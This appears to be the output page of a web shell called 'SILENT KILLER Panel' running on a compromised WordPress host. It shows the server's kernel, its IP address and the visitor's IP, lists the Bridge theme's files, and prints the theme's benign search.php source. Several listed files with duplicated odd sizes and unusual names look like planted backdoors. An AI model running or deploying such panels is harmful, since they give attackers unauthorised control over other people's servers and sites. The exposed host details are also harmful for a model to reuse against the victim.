SILENT KILLERPanel

Current Path: > home > > transcarter > public_html > wp-content > themes > > bridge >


Operation   : Linux host59.registrar-servers.com 4.18.0-513.18.1.lve.2.el8.x86_64 #1 SMP Sat Mar 30 15:36:11 UTC 2024 x86_64
Software     : Apache
Server IP    : 198.54.126.42 | Your IP: 216.73.216.135
Domains      : 1034 Domain(s)
Permission   : [ 0755 ]

Files and Folders in: /home//transcarter/public_html/wp-content/themes//bridge/

NameTypeSizeLast ModifiedActions
css Directory - -
extendvc Directory - -
framework Directory - -
img Directory - -
includes Directory - -
js Directory - -
languages Directory - -
plugins Directory - -
templates Directory - -
tribe-events Directory - -
vc_templates Directory - -
woocommerce Directory - -
404.php File 1834 bytes March 10 2023 20:42:08.
archive.php File 2372 bytes March 10 2023 20:42:08.
blog-chequered.php File 7180 bytes March 10 2023 20:42:08.
blog-compound-dns.php File 26990 bytes March 10 2023 20:42:08.
blog-compound.php File 6056 bytes March 10 2023 20:42:08.
blog-gallery.php File 3312 bytes March 10 2023 20:42:08.
blog-headlines.php File 5471 bytes March 10 2023 20:42:08.
blog-large-image-simple.php File 5616 bytes March 10 2023 20:42:08.
blog-large-image-whole-post.php File 5291 bytes March 10 2023 20:42:08.
blog-large-image-with-dividers.php File 5615 bytes March 10 2023 20:42:08.
blog-large-image.php File 5158 bytes March 10 2023 20:42:08.
blog-masonry-date-in-image.php File 6957 bytes March 10 2023 20:42:08.
blog-masonry-full-width-date-in-image.php File 3381 bytes March 10 2023 20:42:08.
blog-masonry-full-width.php File 3366 bytes March 10 2023 20:42:08.
blog-masonry-gallery.php File 3395 bytes March 10 2023 20:42:08.
blog-masonry.php File 6941 bytes March 10 2023 20:42:08.
blog-pinterest-ajax-response.php File 185495 bytes March 10 2023 20:42:08.
blog-pinterest.php File 6943 bytes March 10 2023 20:42:08.
blog-small-image.php File 5662 bytes March 10 2023 20:42:08.
blog-vertical-loop-less.php File 185495 bytes March 10 2023 20:42:08.
blog-vertical-loop.php File 3078 bytes March 10 2023 20:42:08.
category.php File 2138 bytes March 10 2023 20:42:08.
changes.txt File 137773 bytes March 10 2023 20:42:08.
comments.php File 3645 bytes March 10 2023 20:42:08.
contact-page.php File 8921 bytes March 10 2023 20:42:08.
error_log File 1967 bytes August 06 2025 12:11:17.
event-template-base.php File 26990 bytes March 10 2023 20:42:08.
event-template.php File 3998 bytes March 10 2023 20:42:10.
footer.php File 15878 bytes March 10 2023 20:42:10.
full_screen.php File 3879 bytes March 10 2023 20:42:12.
full_width.php File 5029 bytes March 10 2023 20:42:12.
functions.php File 151174 bytes July 25 2025 12:44:15.
functions.php_bak File 128896 bytes March 10 2023 20:42:08.
header.php File 4983 bytes March 10 2023 20:42:12.
home-soap.php File 26990 bytes March 10 2023 20:42:08.
home.php File 2746 bytes July 16 2025 15:08:39.
index.php File 2606 bytes March 10 2023 20:42:12.
landing_page.php File 9041 bytes March 10 2023 20:42:12.
page.php File 5539 bytes March 10 2023 20:42:12.
rtl.css File 27323 bytes March 10 2023 20:42:12.
screenshot.png File 550419 bytes March 10 2023 20:42:12.
search.php File 8281 bytes March 10 2023 20:42:12.
searchform.php File 401 bytes March 10 2023 20:42:12.
sidebar.php File 1705 bytes March 10 2023 20:42:12.
single-portfolio_page.php File 7550 bytes March 10 2023 20:42:12.
single.php File 4247 bytes March 10 2023 20:42:12.
slider.php File 299 bytes March 10 2023 20:42:12.
style.css File 659 bytes March 10 2023 20:42:12.
theme-includes.php File 2523 bytes March 10 2023 20:42:14.
title.php File 42820 bytes March 10 2023 20:42:14.
woocommerce.php File 4943 bytes March 10 2023 20:42:14.
wpml-config.xml File 46541 bytes March 10 2023 20:42:14.

Reading File: /home//transcarter/public_html/wp-content/themes//bridge//search.php

<?php get_header(); ?>
<?php 
$wp_query = bridge_qode_return_global_query();
$bridge_qode_id = bridge_qode_get_page_id();

if ( get_query_var('paged') ) { $bridge_qode_paged = get_query_var('paged'); }
elseif ( get_query_var('page') ) { $bridge_qode_paged = get_query_var('page'); }
else { $bridge_qode_paged = 1; }

$bridge_qode_sidebar = $bridge_qode_options['category_blog_sidebar'];


if(isset($bridge_qode_options['blog_page_range']) && $bridge_qode_options['blog_page_range'] != ""){
	$bridge_qode_blog_page_range = $bridge_qode_options['blog_page_range'];
} else{
	$bridge_qode_blog_page_range = $wp_query->max_num_pages;
}

$bridge_qode_search_columns = bridge_qode_options()->getOptionValue('search_results_columns');

if( empty( $bridge_qode_search_columns ) ){
    $bridge_qode_search_columns = 'one';
}


$bridge_qode_search_spacing = bridge_qode_options()->getOptionValue('search_results_spacing');

if( empty( $bridge_qode_search_spacing ) ){
    $bridge_qode_search_spacing = 'normal';
}

$bridge_qode_holder_classes = [];

$bridge_qode_holder_classes[] =  'qode-search-results-' . $bridge_qode_search_columns . '-columns';
$bridge_qode_holder_classes[] =  'qode-' . $bridge_qode_search_spacing . '-space';
$bridge_qode_holder_classes[] =  'qode-disable-bottom-space';
$bridge_qode_holder_classes[] =  'clearfix';


// Filter for overriding default search template
$path   = apply_filters( 'bridge_qode_filter_search_page_path', 'templates/page' );
$type   = apply_filters( 'bridge_qode_filter_search_page_layout', 'default' );
$module = apply_filters( 'bridge_qode_filter_search_page_module', 'search' );
$plugin = apply_filters( 'bridge_qode_filter_search_page_plugin_override', false );
$params = apply_filters( 'bridge_qode_filter_search_page_params', array() );

?>
	
	<?php get_template_part( 'title' ); ?>

    <?php if( $plugin ) { ?>
        <?php bridge_qode_get_search_page_template( $path . '/' . $type, $module, '', $params, $plugin ); ?>
    <?php } else { ?>
        <div class="container">
            <?php if(isset($bridge_qode_options['overlapping_content']) && $bridge_qode_options['overlapping_content'] == 'yes') {?>
            <div class="overlapping_content"><div class="overlapping_content_inner">
                    <?php } ?>
                    <div class="container_inner default_template_holder clearfix">
                        <?php if(($bridge_qode_sidebar == "default")||($bridge_qode_sidebar == "")) : ?>
                            <div class="blog_holder blog_large_image <?php echo esc_attr(implode(' ', $bridge_qode_holder_classes))?>">
                                <?php if($bridge_qode_search_columns !== 'one'){ ?>
                                <div class="qode-outer-space">
                                    <?php } ?>
                                    <?php if(have_posts()) : while ( have_posts() ) : the_post(); ?>
                                        <?php
                                            get_template_part('templates/blog_search', 'loop');
                                        ?>


                                    <?php endwhile; ?>
                                        <?php if($bridge_qode_options['pagination'] != "0") : ?>
                                            <?php bridge_qode_pagination($wp_query->max_num_pages, $bridge_qode_blog_page_range, $bridge_qode_paged); ?>
                                        <?php endif; ?>
                                    <?php else: //If no posts are present ?>
                                        <div class="entry">
                                            <p><?php esc_html_e('No posts were found.', 'bridge'); ?></p>
                                        </div>
                                    <?php endif; ?>
                                    <?php if($bridge_qode_search_columns !== 'one'){ ?>
                                </div>
                            <?php } ?>
                            </div>
                        <?php elseif($bridge_qode_sidebar == "1" || $bridge_qode_sidebar == "2"): ?>
                            <div class="<?php if($bridge_qode_sidebar == "1"):?>two_columns_66_33<?php elseif($bridge_qode_sidebar == "2") : ?>two_columns_75_25<?php endif; ?> background_color_sidebar grid2 clearfix">
                                <div class="column1">
                                    <div class="column_inner">
                                        <div class="blog_holder blog_large_image <?php echo esc_attr(implode(' ', $bridge_qode_holder_classes))?>">
                                            <?php if(have_posts()) : while ( have_posts() ) : the_post(); ?>
                                                <?php
                                                    get_template_part('templates/blog_search', 'loop');
                                                ?>


                                            <?php endwhile; ?>
                                                <?php if($bridge_qode_options['pagination'] != "0") : ?>
                                                    <?php bridge_qode_pagination($wp_query->max_num_pages, $bridge_qode_blog_page_range, $bridge_qode_paged); ?>
                                                <?php endif; ?>
                                            <?php else: //If no posts are present ?>
                                                <div class="entry">
                                                    <p><?php esc_html_e('No posts were found.', 'bridge'); ?></p>
                                                </div>
                                            <?php endif; ?>
                                        </div>
                                    </div>
                                </div>
                                <div class="column2">
                                    <?php get_sidebar(); ?>
                                </div>
                            </div>
                        <?php elseif($bridge_qode_sidebar == "3" || $bridge_qode_sidebar == "4"): ?>
                            <div class="<?php if($bridge_qode_sidebar == "3"):?>two_columns_33_66<?php elseif($bridge_qode_sidebar == "4") : ?>two_columns_25_75<?php endif; ?> background_color_sidebar grid2 clearfix">
                                <div class="column1">
                                    <?php get_sidebar(); ?>
                                </div>
                                <div class="column2">
                                    <div class="column_inner">
                                        <div class="blog_holder blog_large_image <?php echo esc_attr(implode(' ', $bridge_qode_holder_classes))?>">
                                            <?php if(have_posts()) : while ( have_posts() ) : the_post(); ?>
                                                <?php
                                                    get_template_part('templates/blog_search', 'loop');
                                                ?>
                                            <?php endwhile; ?>
                                                <?php if($bridge_qode_options['pagination'] != "0") : ?>
                                                    <?php bridge_qode_pagination($wp_query->max_num_pages, $bridge_qode_blog_page_range, $bridge_qode_paged); ?>
                                                <?php endif; ?>
                                            <?php else: //If no posts are present ?>
                                                <div class="entry">
                                                    <p><?php esc_html_e('No posts were found.', 'bridge'); ?></p>
                                                </div>
                                            <?php endif; ?>
                                        </div>
                                    </div>
                                </div>
                            </div>
                        <?php endif; ?>
                    </div>
                    <?php if(isset($bridge_qode_options['overlapping_content']) && $bridge_qode_options['overlapping_content'] == 'yes') {?>
                </div></div>
        <?php } ?>
        </div>
    <?php } ?>

	
<?php get_footer(); ?>

SILENT KILLER Tool